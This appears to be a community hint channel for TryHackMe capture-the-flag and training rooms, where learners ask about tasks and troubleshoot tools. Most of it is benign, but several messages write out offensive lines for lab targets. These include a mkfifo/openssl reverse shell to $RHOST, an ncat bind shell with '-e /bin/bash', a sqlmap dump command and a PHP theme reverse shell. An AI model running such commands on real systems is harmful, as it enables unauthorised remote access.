#room-hints

1 messages Β· Page 108 of 1

white salmon
#

Telnet is on the default port.

nocturne geyser
white salmon
#

You would specify the port if it wasn't default.

nocturne geyser
#

nope

#

i use the kali web based

white salmon
#

On THM?

nocturne geyser
nocturne geyser
white salmon
#

It's outdated, so I wouldn't.

#

like, by 2 years.

nocturne geyser
#

oh ok xd

white salmon
#

Use your own VM, or the attackbox xD

nocturne geyser
#

i will try xD thanks

green minnowBOT
#

Gave +1 Rep to @sage steeple

white salmon
#

It's changed for that task?

nocturne geyser
#

ok mybad xd

#

it was just the wrong vm

#

thanks to your help @white salmon

green minnowBOT
#

Gave +1 Rep to @sage steeple

white salmon
#

Hello, I am working on pickle rick. I just wanted to confirm, if steghide requires a passphrase does that mean there is hidden data within an image?

#

I haven't got the first ingredient yet, but I think it might be hidden in one of the images from /assets

#

I tried steghide on portal.jpg and it's asking for a passphrase

#

oh, well that clears that up. thank you lol

green minnowBOT
#

Gave +1 Rep to @dusk totem

serene ruin
#

hi everyone, I have a question related to the "Password Attacks" room, task 8->3 . I used hydra

http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:failed" -f

#

but does not get right password

#

however by using the Success conditional string I got the password, could anyone explain HOW?

white salmon
#

hello friends, I am working on the pickle rick room but I'd like a hint if possible.

I have viewed page source and obtained the hidden username in html comments
I have used dirb and found the hidden directory
I have scanned all ports with nmap -A and found port 22 open

When I got to this point I was sure I could use the username I found in html and the phrase I found in the hidden directory to ssh into the machine but it didn't work.

I don't want to follow the guide, I want to try and figure it out myself but I hint would be helpful. Thank you.

#

I did also find a filtered port open, but I'm not sure if it's anything yet

loud nebula
#

Or the ||.txt|| file

white salmon
#

I did run dirb but it didn't get any hit on that directory?

loud nebula
#

Whats the name of the directory?

white salmon
loud nebula
#

Sure

jaunty canopy
#

Hello, could someone please give me a hint on anonymous machine?

tranquil mantle
#

Need Help!- Do we have any room in THM for DOS/DDOS.

#

Need to Learn on how to Detect the live DDOS attack or how to read Wireshark File with that details.

iron wigeon
pine swan
#

Hi guys bit of a pain on this question, can anyone help? Intro to Networking Task 7 Question 3 facebook.com registration date; I put in the 01/11/2004 and 03/29/1997 date formats and tried them in other ways but it refuses to accept my answer.

#

πŸ‘ Thanks that worked!

green minnowBOT
#

Gave +1 Rep to @burnt rivet

tranquil mantle
green minnowBOT
#

Gave +1 Rep to @iron wigeon

willow sparrow
#

i need help in the route whatisnetworking-task4-second question

#

i cant find the answer

#

alr thx

#

ok πŸ‘

#

i read the thing over and over again but i guess i just missed it

wind peak
#

hello people. im currently on network services enumerating ftp and this question baffles me. its asking what variant of ftp is running. how do i figure that out lol? please @ me

#

many thanks in advance

#

of course i did

#

all it told me was the ports

#

unless i should run a full tcp connect

#

i dunno 😦

#

oh wait thats a thing isnt it. lemme open the man page

#

cuz i did verbose

#

and nothing extra came up

#

lmao

#

my bad

#

forgot the most important switch

#

-_-

#

thank you @burnt rivet

green minnowBOT
#

Gave +1 Rep to @burnt rivet

wind peak
#

i feel like a real noob

#

ive been so out of practice lol

sullen musk
#

anyone have hints for Steel Mountain task 4? every time i try running python 39161.py <ipaddress> <port> i get the message shown in the picture.. I do have an http server and nc session listening but still cacnt figure out what is happening to get this crash

#

tried running python2 and 3 and got the same issue... ill have to double check the google search i did for the error apparently haha

wind peak
#

where do i download rockyou.txt lol

#

trying to use hydra but dont have the wordlist

#

hmm

#

no idea why its not working

sullen musk
#

off the top of my head i cant recall the exact ones but they are in the Complete Beginner Path.. its the path im working on now

wind peak
#

dont worry

#

its just that it had a different extension

#

rockyou.txt.gz

#

i manually went to the folder to look

#

thanks again @burnt rivet

green minnowBOT
#

Gave +1 Rep to @burnt rivet

sullen musk
#

you're right once again i am thinking attackbox haha its been a long day

#

all i know is im going to work on this lab again tomorrow and figure stuff out got to play with the urllib stuff since python split it for python3 and i have to leave the office soon

#

thanks again for your hint @burnt rivet you always push me in the right direction

green minnowBOT
#

Gave +1 Rep to @burnt rivet

wind peak
#

ladies and gentlemen. i been at it for a long time and i dunno what to do. What is ftp.txt task 10 in network services

#

when i try to download the ftp.txt file

#

it says access denied

#

but i am logged in and mike

#

so confusion

#

help me plz

#

thanks in advance ❀️

#

okay i got it

#

works now -_-

solar forge
#

hey guys!

#

for the last challenge

#

should i find all possible pe vectors?

#

or maybe there are a lot of em that are bait and only one works

alpine kestrel
#

also if you go by using some of the tricks they discuss in this room you will find just a few to be used

#

need anything specific as a hint???

solar forge
#

nah i just needed to know for educational purposes

#

like it's best if i try and explore everyone of the vectors

alpine kestrel
deep crystal
#

hey, I am doing the OWASP-Juice-Shop Task4. I am using the AttackMachine and the needed seclists are not installed. Also I cannot install them by "apt-get install seclists". Any ideas? In the Kali-Machine, there is no burp plugin installed. I tried to install it manually and set up the proxy, but it did not intercept properly, for some reason

EDIT: nvm. Found the wordlist. They were just under a different location, than listed in the task πŸ™‚

alpine kestrel
#

yuups they are in opt instead of /usr/share

#

if shadow recall correctly

#

otherwise when you get into this kinda situation the find command is useful to find where things are stored

deep crystal
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

reef nimbus
#

hey guys , Δ± have been trying to make a progress in network security solutions path , but Δ± can not make it go when Δ± came across with evasion via payload manipulation path , is that anyone who is solve the last question ?

teal osprey
#

any hints on oh my webserver?

teal osprey
#

still need help for root on oh my webserver

fathom oracle
#

Hey all, in the "Team" CTF I've found the rsa file, but when I try to use it to SSH in I get the error "invalid format." google is so far unhelpful as to what I'm doing wrong to fix that. Any hints on where to look?

sturdy hearth
#

!docs verify

proud scarabBOT
fathom oracle
#

!docs verify

proud scarabBOT
fathom oracle
#

Working on the verification..

white salmon
#

Do you know how now?

fathom oracle
#

Yep, just did it.

white salmon
#

πŸ™‚ Cool.

fathom oracle
sturdy hearth
# fathom oracle

Remove the first two lines
It should be -

-----BEGIN OPENSSH PRIVATE KEY-----
.
.
.
-----END OPENSSH PRIVATE KEY-----
fathom oracle
#

Got it...

#

Thanks! knew it was something stupid I was doing wrong

#

I'm in... πŸ™‚

balmy wedge
#

Looking for very slight hint with foothold for Enterprise

#

like the most basic possible hint.

#

I found the ||xlsx and docx files|| but I am kinda stuck on ||how to decrypt them.||

abstract kraken
#

Hi everyone, I have some trouble with a question from Task3 of SNORT room (https://tryhackme.com/room/snort):

According to the official description of the snort, what kind of NIPS is it?

#

I thought it would be sthg like rule based, but apparently not

#

Any suggestions?

plain crescent
#

Hi, what did you do to resolve the issue? I'm banging my head against the wall... 😒

smoky leaf
#

Hey guys, stuck on Burp Suite module Task 13 Qstn 1: failing to find the suspicious page on the site map. What am I missing?

long wyvern
#

Hi everyone,

Need some assistance here. I cannot see what I am doing wrong here.

I am using sqlmap to get the flag for Task 6 on sqlilab. I amm running the command sqlmap -u http://10.10.110.236:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump

But it is resulting in an error that I cannot seem to get past.

white salmon
cedar anvil
#

Well, it's not a proper docker escape

#

Enumerate the host network

glad remnant
#

Hello everyone, can I get a hint on this room using nmap? I'm on task 14 practical and the question is:

"Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

There is a reason given for this -- what is it?

Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!"

I did the first part and performed the xmas scan using code 'nmap -sX -vv -p 1-999 10.10.187.1' and got the results.

I don't see the answer in the output of the terminal after running this.

umbral kernel
#

hello, looking for a helping hand in the John the Ripper room, task 6...I've unshadowed the file and passed it into John. but it's taking agesssssss, is it supposed to? I followed the instructions exactly. It's only a four character password so I thought it would have been quicker! If I just have to sit and wait that's fine, but I expected a task question to not take forever. Thank you!

umbral kernel
shrewd skiff
#

Anyone did the room called "Intro to Digital Forensics" ? The very first question "Consider the desk in the photo above. In addition to the smartphone, camera, and SD cards, what would be interesting for digital forensics?". I must say I basically ran out of words, and im tired of guessing. A 6 letter word. Any ideas?

shrewd skiff
white salmon
#

Ok.

shrewd skiff
#

i tried stuff like pencil

white salmon
#

No..

shrewd skiff
#

papers

white salmon
#

Think technology.

shrewd skiff
#

im the image there are only postit, a pencil, papers, laptop and the three they mentioned it is not

white salmon
#

Are you sure?

shrewd skiff
#

if its the fist above picture yea

#

yea

#

oh darn.. i spelled it wrong

shrewd skiff
#

i even wrote it correctly there.. its those small things that catches me.. hehe.. my spelling

white salmon
#

πŸ˜„

#

Glad you got it.

shrewd skiff
#

yea i was about to think i totally cant see

#

i began to doubt my own eyes

cedar anvil
odd spear
#

hello friends, i have been on LFI challenge in the pre-security path for a awhile now...and i can't seem to find my way to the flag on challenge 2...please i need hints on how to think in the right direction to solve the problem..thank you

tranquil parcel
civic falcon
#

Hi folks, hope your all well. I wanted a bit of guidance on John. I'm on the John module, specifically the NTLM windows crack.

Using John to find the format #john --list=formats | grep -iF "NTLM" I get a half dozen suggestions. I tried all three that had NTLM in the body; netntlmv2, netntlm, netntlm-naive via the john syntax.

All of them gave me an error.

In checking with the answer expected, I noticed it was **. So I guess it was NT.

Setting up john again; #john --format=nt --wordlist=/home/rockyou.txt /home/ntlm.txt and running gave me the correct mushroom password.

My question is, why does the format checker give me NT as opposed to the others?

autumn rock
#

Anybody started the initial access room ? I need hints on task 8 😴

outer violet
bronze elbow
#

Good evening animewave
I'm doing a room provided by my school and I found a file in which it's written :
Help will always be given at Hogwarts to those who ask for it.
I was wondering if it's some sort of meta-hint where i'm supposed to go here or maybe on the school teams to ask ?
I searched the discord for the name of the box and didn't found anything and "Hogwarts" seems to be another unrelated challenge ?
https://tryhackme.com/room/yerawizard
Thanks for the help !

left thunder
bronze elbow
grim ridge
grim ridge
white salmon
#

Hello again friends, I am learning gobuster in room CC: Pen Testing, I have a machine deployed, and it wants me to find the hidden directory, but it's not a web app? When I use gobuster dir -w common.txt IP it says URL flag not set, so I put -u before the IP and it says it cant connect? It also doesn't appear to be a web app as I can't load the URL in my browser.

restive crater
#

I'm working on the "Network Services" room. I'm on task 4 and attempting the following question:


Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by:

- using the username "Anonymous"

- connecting to the share we found during the enumeration stage

- and not supplying a password.

Does the share allow anonymous access? Y/N?

When I try to connect I get the error tree connect failed: NT_STATUS_BAD_NETWORK_NAME and I'm attempting to use the following command to access the SMB share: smbclient //ip-addess/POLOSMB -U anonymous Can anyone point out where my error is with the provided information or is more information needed?

#

I've tried with the "A" in anonymous capitalized and not capitalized.

terse nova
terse nova
slow carbon
#

Hey guys I am doing the room (Part 3 Linux Fundamentals) where you have to use the wget command to download a file I have completed:

  1. Ensure you are connected to the deployed instance (10.10.26.217)
  2. Now, use Python 3's "HTTPServer"
    struggling to get access to file
    I have tried the following command with no luck: wget http://10.10.26.217:8000/.flag.txt
slow carbon
#

hey @terse nova its part 3 task 4 - Downloading Files

terse nova
slow carbon
green minnowBOT
#

Gave +1 Rep to @terse nova

white salmon
green minnowBOT
#

Gave +1 Rep to @terse nova

terse nova
white salmon
#

thanks

vagrant dove
#

what is the purpose of this command… python -c β€˜import pty;pty.spawn(β€œ/bin/bash”)’

#

can see it was used in a walkthrough after creating a session through metasploit

ionic cave
#

It spawns shell (bash) and attaches your stdin/out to it

tranquil stag
#

Hi all

#

In Overpass 2 - Hacked , i dont connet to shh port 2222 , i received error nable to negotiate with 10.10.122.175 port 2222: no matching host key type found. Their offer: ssh-rsa

#

Can help me ?

left thunder
tranquil stag
#

thanks

left thunder
tranquil stag
#

ok, tks

vagrant dove
alpine kestrel
#

rsa got deprecated????

#

sounds weird but sure

ionic cave
left thunder
alpine kestrel
green minnowBOT
#

Gave +1 Rep to @left thunder

alpine kestrel
#

it basicly states that SHA1 is being detracted for use as a hashing and signature method for ssh and that happens a lot with the old ssh-rsa thingy and will be fixed by updating it

patent pike
#

can someone tell mee why everytime i login thru rdp i get reconnecting attempt (on several machines) and it won't let me connect can someone tell me why please?

left thunder
patent pike
#

my own machine

#

box is the sequel to ice ( blaster if i remember this right)

#

i also use remmina

left thunder
patent pike
#

i closed my pc right now cuz i got headaches all day on pc but i think it's one of the firsts tasks where it asks u to open the rdp to get some files

left thunder
patent pike
#

i tried several minutes ago but i got tired cuz of the reconnecting attempt and closed it

#

i tried it while the machine is online

left thunder
patent pike
#

haha okay thanks Although bro!

restive crater
green minnowBOT
#

Gave +1 Rep to @terse nova

restive crater
#

Thank you. Figuring out how to open the file was a different story... Found an easy answer on THM forums but I don't think I woulda found the "get" command without it. Maybe I learned it previously and forgot.. :shrugs: I did take 4 months off from this lol

noble peak
#

fundamentals part 2, Task 5, question 1: "On the deployable machine, who is the owner of "important"? // ls -l filename . # not sure where to go from here

left thunder
smoky leaf
left thunder
normal lake
#

Hey guys, I'm doing wreath network and im currently on the webserver exploitation stage, my issue is that, the question is asking for root users password hash, but one i enter the hash i got from the shadow file it says incorrect answer

cedar anvil
normal lake
#

Okay thanks

left thunder
# smoky leaf yes please

You have to login to the webapp first with the creds provided in task 6, after that you can navigate to the page needed for task 8. Note that you have to capture a request while being logged in.

smoky leaf
green minnowBOT
#

Gave +1 Rep to @left thunder

cedar anvil
#

!docs verify

proud scarabBOT
green minnowBOT
#

Gave +1 Rep to @cedar anvil

smoky leaf
#

Hey team, am on LFI task 2last qstn: my isssue is this invalid format I am getting....my permissions are good (600) but im stuck...any pointers?

#

uhmmm I even re-copied and pasted but stll no change

#

any special way to do it from browser to file?

#

many thanks @burnt rivet - that did the trick!

green minnowBOT
#

Gave +1 Rep to @burnt rivet

smoky leaf
#

Hey Team, so im doing the LFI Walkthrough room(https://tryhackme.com/room/lfi#). I enumerated the system using the LinEnum script then went to GTFO to look for binaries that can help me privilege escalate for all files with s-bit set. Got nothing, whats my next step from here?

left thunder
outer pewter
#

Good afternoon, I am running into issues on the Authentication Bypass Brute Force room. The ffuf cmd on task 3 won't get past an error. I did solve task 2 and saved the file just can't get past 3. Any hints to my syntax for the cmd?

outer pewter
#

The file is a the correct name from the previous task .txt it is just the names that were found. The errors and the syntax are in the screen capture.

#

o

left thunder
left thunder
#

!docs verify

proud scarabBOT
smoky leaf
#

so these I the SUID files I got:
[-] SUID files:
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 149080 Oct 11 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newuidmap
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Aug 23 2019 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Aug 23 2019 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /bin/su

I then cross-checked the files with any of them on gtfobins in order to get one with the s-bit set. I got no hits...so not sure how I will escalate to root and get the flag....

left thunder
smoky leaf
left thunder
#

And question 1 was about what the falcon user can run with sudo/root

smoky leaf
# left thunder But it has sudo

so my thinking is I have to run a script from gtfobins..check myuser account change from falcon to root....navigate the directory and get my root flag. I might not be understanding the requirements then...

left thunder
#

There is no script to run whatsoever

smoky leaf
smoky leaf
green minnowBOT
#

Gave +1 Rep to @left thunder

coral cedar
#

c

pallid raptor
#

I am not able to find answer of "What is the top operating system for MYSQL servers in Google's ASN? "
yes I have tried : 5.6.40–84.0-log (wrong answer)

white breach
#

What solved it? lol! I'm still getting the same unresponsive screen on the attacker side. So Let me get this straight, ncat -lvnp 1234 -e /bin/bash on the attacker side, and ncat ipnumber 1234 on the victim side correct? Did you need to encode the victim's string with base64 or anything to mask it from the IDS/IPS before hand?

daring bison
#

Hey guys, I've been having issues with the authentication bypass room for the Jr Penetration tester path, specifically the brute force section. In the section we have to use a file with usernames that were found with ffuf in the previous section, however when I run the command to try and find the password for the those usernames I don't get any results back. Any idea what I am doing wrong?

wheat helm
#

!docs verify

proud scarabBOT
toxic summit
#

Hello!

#

In the windows fundamentals 1 room there's a question that goes "Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?" I am out of options. What is it?!

#

Any hints? There's an icon that doesn't even render on the virtual machine.

left thunder
toxic summit
#

NVM got it

#

Thank you anyways!

vagrant temple
#

Hey, I'm in the Brainstorm room and can't really figure out why my fuzzer script won't work. If anyone has solved it and are willing to help it'd be appreciated

wheat helm
#

!docs verify

proud scarabBOT
vagrant temple
#

ok done

glossy dawn
#

howdy. Im doing a wordpress theme editor exploit. I saved my php rev shell to a theme file (404). I forget how to navigate to it to call the shell. anyone remember?

#

found it

white breach
#

Yup yup, that did it πŸ‘ŠπŸΎπŸ˜”

dry mesa
amber sail
#

Blue room, cant find flag2 even did "search -f flag2.txt

#

looked at a video to see if i was missing something and found out what location the flags supposed to be in and its not there

#

ive restarted the machine 3 times

#

well i found out the answer because of the video but i still wanna know why it was missing

#

unless i got unlucky and it deleted it 3 times

tranquil parcel
frank leaf
#

Can anyone give me a nudge on the Room nerd-herd?

cedar anvil
frank leaf
#

Got the potential username, But don't know what to do next

#

Idk what I'm missing

cedar anvil
#

You should have the encrypted password as well

#

Hints are : key is in the video you found
The encrypted text is a cipher

frank leaf
#

I thought that was a rabbit hole

#

lol

cedar anvil
#

Yeh, missed it when I did it too

frank leaf
#

Got it, Thank you @cedar anvil

green minnowBOT
#

Gave +1 Rep to @cedar anvil

burnt oriole
#

anyone wanna give me some advice?

white salmon
#

this script would take one minute to get executed ikr?

frank leaf
#

FFUF isn't able to find any Subdomains while fuzzing in CMess box. Is there a particular reason for this?

#

ffuf -w <wordlist>:FUZZ -u http://something.thm This is command I used

cedar anvil
frank leaf
#

Ohhh Vhost fuzz?

cedar anvil
#

remember for finding sub-domains, you need to add a domain in your /etc/hosts

frank leaf
#

Yeahh I did that, Using -H flag might just work I guess

cedar anvil
frank leaf
#

Yeah I did try dns in Gobuster but still didn't work.

sturdy hearth
cedar anvil
frank leaf
#

Subdomain on the same IP is known as a vhost yeah XD

cedar anvil
#

If you keep correcting every little thing I type, I'll die PES_HahaDead

sturdy hearth
white salmon
#

Hey. I'm stuck in Broken Authentication task in OWASP Top 10. I'm doing as stated register " darren", fill mail n password. Then Sign in, but no luck 🀞. Can someone give a hint or DM me where I went wrong....

white salmon
#

is there any room about servers and P2P

trim dome
left thunder
white salmon
#

Yes

left thunder
# white salmon Yes

The quotation marks are just there so that you can see that there is a space in front of the username, you are not supposed to actually register the account with these marks

white salmon
#

Thanks @left thunder.

green minnowBOT
#

Gave +1 Rep to @left thunder

white salmon
trim dome
green minnowBOT
#

Gave +1 Rep to @humble cave

thorny bluff
#

anyone wanna give me a hint on how im supposed to use the scripts on the startup room

#

everything i try i dont have perms

thorny bluff
#

lennie

#

already tried editing /etc/sudoers with it but it said permission denied

#

wdym

#

ok give me a couple minutes

#

yeah dont know how im supposed to use print.sh for escalation since im the owner of it

#

tried using it to cat /root/root.txt

#

when i execute it just says permisson denied

#

ik

#

when i checked crontab there was nothing executing it tho

#

that is a part i missed

#

I understood that part im just trying to find the cronjob

#

i ran linpeas.sh but didnt find anything, want does pspy64 do differently?

#

yeah im reading the github page

#

im just wondering why i couldn't see the cronjob but pspy64 can, so if i couldn't use pspy64 how could i figure out there was a cronjob

#

went through both /etc/crontab and /etc/cron.d and nothing stuck out to me.

#

finished the room but will need to go over again sometime

#

thank you @white salmon

green minnowBOT
#

Gave +1 Rep to @dusk totem

past edge
#

Hey! Sorry to bother you guys, but I am having trouble with a room, and I'm not sure if I'm missing something.

#

In the Encryption - Crypto 101 room, Task 8's question seems like it should be the easiest thing on THM so far (Who is TryHackMe's HTTPS certificate issued by?) but when I enter in what I believe is the correct answer, I'm getting an incorrect response.

#

Thoughts??

white salmon
#

The certificate may have changed?

past edge
#

I checked some older walkthroughs which had a different answer for that field, so I'm sure it has changed over time, but it looks like it's not taking the current issuer ... unless I'm being MITM'd πŸ˜…

white salmon
#

No, the answer will be set to what it was before, it won't change in real time to reflect the certificate change, if it that's what's causing it.

alpine kestrel
#

nope that is the actual one

white salmon
#

That's the actual cert.

alpine kestrel
#

from shadows ubuntu machine without an antivirus

#

seems the room needs an update then

white salmon
#

It's an old room.

#

Certificate changed today.

past edge
#

Perfect timing πŸ˜†

alpine kestrel
#

or at least shadow assumes their ubuntu machine is not gettign MITM'd

#

if it is shadow is spooked

white salmon
#

Does your Cert have 25/3/22?

alpine kestrel
#

2021-03-25 as the start date and 2021-06-23 as the end date

white salmon
#

Yup

alpine kestrel
#

also lets encrypt

left thunder
alpine kestrel
#

so it matches the other people in here hence assuming it is fine

white salmon
#

It is.

white salmon
#

If not, I can give you it.

#

Unless James changes the answer.

alpine kestrel
#

well guess we can leave a report in room-bugs about it now

white salmon
#

James has also addressed that too.

#

Today around 1PM.

past edge
alpine kestrel
#

yeah but as kinda proven by us now it has actually changed

past edge
#

Ah, got it! Read the link that @left thunder posted and found what I needed. Thank you!

green minnowBOT
#

Gave +1 Rep to @left thunder

past edge
#

Thank you @white salmon

#

Thank you @alpine kestrel

left thunder
#

+rep @white salmon

green minnowBOT
#

Gave +1 Rep to @sage steeple

alpine kestrel
#

well then time to call it a night

left thunder
#

So that no one will be left behind +rep @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

oh thanks for that @left thunder

green minnowBOT
#

Gave +1 Rep to @left thunder

alpine inlet
#

hey in cc pentest room last task i found a hidden directory called secret but im unsure of what to do next. Not sure which of the tools from the room are applicable

#

this is my furthest progress

sturdy hearth
sturdy hearth
alpine inlet
#

Okay thanks @sturdy hearth

green minnowBOT
#

Gave +1 Rep to @sturdy hearth

wise kiln
#

why its not starting?

sturdy hearth
# wise kiln why its not starting?

Is that your personal system or a deployed machine from THM?
I don't think you should be starting firefox.service, it isn't a service.
e.g. apache2.service, fail2ban.service, syslog.service are sevices.

#

It doesn't exist

wise kiln
green minnowBOT
#

Gave +1 Rep to @sturdy hearth

wise kiln
#

need help with this too

#

how to fix this vmbox always on top

wise kiln
#

what does instance mean?

amber sail
#

.

left thunder
wise kiln
green minnowBOT
#

Gave +1 Rep to @left thunder

spark geyser
#

heyy, I'm doing the Relevant room, and I don't seem to find a way to get access. Can it be eternal-blue and i just fuck it up?

#

Is there like any service I should focus on more?

chilly prawn
#

"Network Services", any hint on how to guess the username on Task 4 exploiting SMB ?

white salmon
#

hi can anyone give me a clue

#

im on my way to the second ingredient

#

well

#

since the

#

clue says look around the filesystem

#

i checked every file

#

or smth like this

#

checked the html pages

#

there is a comment

#

oh jeah etc

#

thanks

#

quite not sure what to do with that comment

#

which would be a good place to start to find out what the algorithm is

#

ahhh base 64

#

so i kinda decoded it? haha

#

ill do thanks πŸ™‚

grim walrus
#

stuck on NETWORK SERVICES 2 room

#

will continue when i get home from dinner but i am wondering if anyone is willing to do a full walkthrough with me as i dont understand where i am going wrong!

#

i am a COMPLETE BEGINNER

#

super super novice

#

πŸ˜†

#

the enumerating task. do i need to use the tryhackme attack box or should i be using a VM or something

#

it wont nmap properly

#

ive used write ups but dont understand where i am messing up

#

on network services 2 room

#

task 3

#

NFS

#

nmap -A -p- IP -vv

#

shows me 4 ports but im supposed to see 7 according to the answer

#

anyway will return later, thank you lassi

mortal cave
#

Burpsuite Help.

#

When I type in the IP address of the virtual machine into the firefox url it does not take me to the OWASP juice shop. I get an error instead.

mortal cave
#

the web page just says error 404

left thunder
mortal cave
#

how do I get the OWASP juice page to show up?

jaunty canopy
#

Hello everyone, any nudge on wonderland room?

white salmon
#

hey, i can run openssl as root using doas command and i am suppose to get a reverse shell using this command mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | doas openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s but i am getting the reverse shell as the user i am running this command any solution ?

wise kiln
#

doesnt work man

tidal sedge
#

You're supposed to use RDP as specified in task 1?

#

Or you could use the browser version

white salmon
#

Attempting XSS in room OWASP Juice Shop. The directions are as followed:

#

But the header in Burp does not appear the same. Even when I manually input the header line they ask, it doesn't seem to work.

#

this SS does not have my input. It's just the first one that comes up, untouched.

#

I just input the extra line True-Client-IP and then forward it.

#

yes. doesn't seem to work

#

Okay

#

the last line I had the input. theres no true client ip in the header when it's initially caught, so i inserted it.

#

I did not enter "Do Not Track"... that wasn't in there, either but I just left it as-is

#

and just inserted the string for the XSS

#

there's the original. It's only 1 line difference

left thunder
white salmon
#

yeah. doesn't seem to have any effecct

#

tried it with and without

#

idk man...

#

it's a super-simple task. idk why it's not working

left thunder
#

Other then that I guess I would have to try it on my own

white salmon
#

that doesn't seem to work, either. I thought that it might.

left thunder
white salmon
#

sure. np

left thunder
#

After you edited the request, what was your next step?

white salmon
#

logged back in and continued to the Last IP page

#

Did I miss another request?

left thunder
white salmon
#

wait... it did work...

#

but the XSS popup didn't work... I got the code

#

I'm very confused now

left thunder
#

Maybe you got it because I did it before

white salmon
#

So, it worked, but it didnt work

#

well, maybe

#

hang on

left thunder
#

No just tried it with only releasing, should work fine

white salmon
#

before and after...

#

tried url encoding as well

left thunder
white salmon
#

what would the 2nd line be?

left thunder
white salmon
#

Okay... that was the issue. They never explained that and I'm brand new to http.

#

thank you. much appreciated.

#

I just don't understand why it was necessary to add 2 lines

#

shit... I didn't get the code that time..

left thunder
white salmon
#

Ohhhh

#

I see

#

thank you... now, i'm not getting the code a second time.

#

what have i done

#

I didn't want to cheat so I closed the flag

#

i'll have to restart the machine... f

left thunder
#

In case you didn't already restarted it

spark geyser
#

In Internal room- logged in to the the wordpress website. And found another credentials for something else. any hints what to do next?

spark geyser
#

i can edit the site, which gives me xss exploit. themes and plugins are protected from writing

#

i guess i'm not seeing something

#

i get this message on every file i wanna edit:You need to make this file writable before you can save your changes. See Changing File Permissions for more information.

#

❀️

white salmon
#

Can i have help with the Rocket room please?

dry gate
#

Hi, I'm working on the Windows Internals room (https://tryhackme.com/room/windowsinternals) and I'm stuck on the first question of Task 2. I searched for Procmon on the Windows machine but couldn't find it and I can't download it either since Explorer doesn't seem to be working. What am I missing? :o

white salmon
#

No, so ok i think i must try to do this πŸ˜…

#

Thank you πŸ™

green minnowBOT
#

Gave +1 Rep to @dusk totem

potent granite
#

Hi, for room (https://tryhackme.com/room/networkservices) Task 6, I answer all the previous questions but this one I don't understand what's asked really.

Based on the title returned to us, what do we think this port could be used for?

what title ? the one on the open port ? because I don't see one

left thunder
green minnowBOT
#

Gave +1 Rep to @left thunder

white salmon
#

hey, i am doing a room where we have to exploit lfi i have got the code (PHP) any hints what should i do afterwards

white salmon
unkempt wren
#

this shit makes me wanna kms

white salmon
#

sorry in advance for the dumb question. I am in active directory basics room. the first question is asking me what's the windows 10 operating system on the machine.. I have checked system info it seems to be windows server 2019 standard, but this isn't the correct answer. I know I'm doing something dumb, any tips welcome. thanks.

vernal basin
#

2019 is not Windows 10.

#

But it could be the long version number. Something like 10.2039.49485833

#

The build number

#

20H2 Build number: 19042

#

That's just generic. I haven't done this room

white salmon
#

I tried enterprise edition as a guess but no good

vernal basin
#

Check msinfo

white salmon
#

i run msinfo32 I get OS version microsoft windows server 2019 standard

#

I'm sure I'll facepalm when I find the answer

vernal basin
#

Which task is this?

white salmon
#

active directory basics hands on lab

#

active directory basics is the room

#

hands on lab is the task

vernal basin
#

Found it. It looks like it starts with ||Windows 10||

white salmon
#

ok lol

#

don't assume I guess

vernal basin
#

Have you tried the suggested command?

#

||Get-NetComputer -fulldata | select operatingsystem||

#

The server is unreachable for me

white salmon
#

it's not case sensitive right? thanks for the help btw

#

idk why I'm having so much trouble with windows and powershell

vernal basin
#

Windows usually isn't

#

I have an idea....

white salmon
vernal basin
#

Did you set up powerview?

vernal basin
# white salmon go on...

I got it. Powerview is the key to the entire thing. It's all in the part above the task. they just don't make it obvious

green minnowBOT
#

Gave +1 Rep to @vernal basin

white salmon
vernal basin
green minnowBOT
#

Gave +1 Rep to @muted siren

old dew
old dew
verbal kayak
#

Hey guys I am doing an easy room (Cyborg) and all I am looking for is what I am doing wrong with this certain part. I discovered the hash and using JTR to try to crack the hash using rockyou and I am absolutely getting nothing. I went through walkthrough only to see if others are doing what I am and they seem to be getting the pw. I used "john --wordlist=/usr/share/wordlists/rockyou.txt.gz <filename>"
and it completes without cracking the hash.

#

I think the rockyou.txt.gz is the problem because I did notice I was the only one having that file with .gz at the end

haughty axle
#

send screenshots

#

U are meant to use a file format which is rockyou.txt

#

Or try unzipping it

verbal kayak
#

let me try this thing real quick, downloading a different rockyou list because I have had this issue before with the list that comes with the kali linux vm

#

oh I haven't tried that

